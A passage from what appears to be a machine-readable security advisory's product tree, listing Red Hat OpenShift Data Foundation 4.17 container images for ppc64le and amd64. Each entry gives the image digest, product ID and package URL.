"odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_id: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_id: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_id: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_id: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_id: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_id: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_id: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_id: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_id: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_id: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_identification_helper: { purl: 